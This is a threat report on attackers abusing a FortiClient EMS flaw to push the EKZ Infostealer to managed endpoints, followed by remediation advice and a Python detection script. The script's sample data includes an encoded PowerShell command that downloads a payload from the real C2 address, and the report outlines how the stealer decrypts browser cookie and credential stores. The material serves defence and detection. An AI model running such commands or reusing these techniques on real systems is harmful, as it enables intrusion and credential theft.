Weaponizing Management Consoles: The FortiClient EMS Exploitation
Infrastructure Subversion and Disguise
Adversaries recently turned a trusted endpoint management system into a conduit for data exfiltration. According to Arctic Wolf Labs, the compromise began with an exploit against FortiClient Endpoint Management Server (EMS). The attackers then pushed a malicious payload to managed endpoints through standard administrative mechanisms, disguising the binary as a legitimate Fortinet update.
Exploiting the Access Flaw
The campaign is tied to a critical vulnerability in FortiClient EMS, tracked as CVE-2026-35616. The flaw is an access-control bypass: unauthenticated actors could sidestep API validation entirely and send privileged requests to vulnerable servers. After gaining control of the EMS settings, the attackers altered the Remote Access Profile configuration and manipulated endpoint policies to embed a malicious startup script across managed hosts.
The Mechanics of Tunnel Execution
The intrusion relied on FortiClient's native VPN configuration. During IPsec tunnel establishment, FortiClient components such as fortitray.exe or ipsec.exe ran batch files, which in turn launched cmd.exe directly from the FortiClient directory. That shell silently executed an obfuscated, Base64-encoded PowerShell script, which downloaded the malicious payload from the remote server 83[.]138.53[.]110 and returned execution output over HTTP.
Deconstructing the Stealer Component
On compromised endpoints the downloaded binary was named FortiEndpoint_Patch.exe; on the attackers' server it was stored as p.exe. Arctic Wolf Labs classified this stealer as EKZ Infostealer. It primarily targets data stored by Chrome, Microsoft Edge and other Chromium-based browsers, and also harvests data from Firefox and other Gecko-based applications. The malware extracts stored credentials, session cookies and autofill form data, as well as telephone numbers, physical addresses and payment card details.
Session Hijacking and Authentication Bypass
Session cookies are an especially serious exposure in this attack chain. With stolen cookies an adversary can replay an active user session and often bypass multi-factor authentication entirely, because the session has already passed that check. To harvest them from Chromium-based browsers, EKZ Infostealer circumvents the Chromium Elevation Service; for Firefox, it loads the Network Security Services (NSS) modules directly and uses them to decrypt the standard profile databases key4.db, logins.json and cookies.sqlite.
Discovery of Secondary Artifacts
Arctic Wolf Labs also found additional malicious artifacts on the command-and-control server: a compressed archive, a rogue MSI installer package and an executable bearing a misspelled Microsoft Windows name. Investigators observed no execution of these files during the documented intrusion.
Prescribed Remediation and Threat Hunting
Organizations running FortiClient EMS are strongly advised to upgrade to the remediated version immediately and to restrict access to management port 8013 to trusted IP addresses only. To detect compromise, review EMS event logs for certificate anomalies and monitor for unauthorized changes to the Remote Access Profile. Finally, hunt for anomalous PowerShell executions originating from the FortiClient directory, and for outbound traffic to 83[.]138.53[.]110.
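The hunt above can be expressed as a small scorer over process-creation telemetry. The following is an added example, not code from the report or from Arctic Wolf Labs; it assumes Sysmon-style fields (parent image, image, working directory, command line), a default FortiClient install path, and a hypothetical batch file name vpn_up.bat, and it runs over constructed sample events rather than real incident data.

```python
import base64
import re

# Assumed FortiClient install path (not from the report); adjust per environment.
FORTICLIENT_DIR = r"c:\program files\fortinet\forticlient"
C2_HOST = "83.138.53.110"  # written defanged as 83[.]138.53[.]110 in the report

def decode_encoded_command(cmdline):
    # PowerShell -EncodedCommand (and its short forms) carries base64 of UTF-16LE text.
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return ""

def score_event(ev):
    # Returns the list of report-derived indicators one process-creation event matches.
    hits = []
    parent, image = ev["parent_image"].lower(), ev["image"].lower()
    cwd, cmdline = ev.get("current_directory", "").lower(), ev["command_line"]
    decoded = decode_encoded_command(cmdline)
    # 1. a FortiClient VPN component starting cmd.exe during tunnel setup
    if parent.endswith(("\\fortitray.exe", "\\ipsec.exe")) and image.endswith("\\cmd.exe"):
        hits.append("forticlient_component_spawned_cmd")
    # 2. cmd.exe / powershell.exe running out of (or referencing) the FortiClient directory
    if (cwd.startswith(FORTICLIENT_DIR) or FORTICLIENT_DIR in cmdline.lower()) \
            and image.endswith(("\\cmd.exe", "\\powershell.exe")):
        hits.append("shell_from_forticlient_dir")
    # 3. encoded PowerShell whose decoded body references the C2 host
    if C2_HOST in decoded:
        hits.append("encoded_powershell_contacts_c2")
    # 4. the disguised "update" binary name, in the image, arguments or decoded script
    if "fortiendpoint_patch.exe" in (image + cmdline + decoded).lower():
        hits.append("disguised_update_binary")
    return hits

# Constructed sample events (not real telemetry): the report's chain plus one benign cmd.exe.
_ENC = base64.b64encode(
    "Invoke-WebRequest http://83.138.53.110/p.exe -OutFile FortiEndpoint_Patch.exe".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Fortinet\FortiClient\fortitray.exe",
     "image": r"C:\Windows\System32\cmd.exe", "current_directory": FORTICLIENT_DIR,
     "command_line": r'cmd.exe /c "C:\Program Files\Fortinet\FortiClient\vpn_up.bat"'},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "current_directory": FORTICLIENT_DIR,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "current_directory": r"C:\Users\alice", "command_line": "cmd.exe /c dir"},
]
```

Feeding `SAMPLE_EVENTS` through `score_event` flags the first two events (the fortitray.exe-to-cmd.exe hop and the encoded PowerShell that names both the C2 host and the fake patch) and leaves the benign event with no hits.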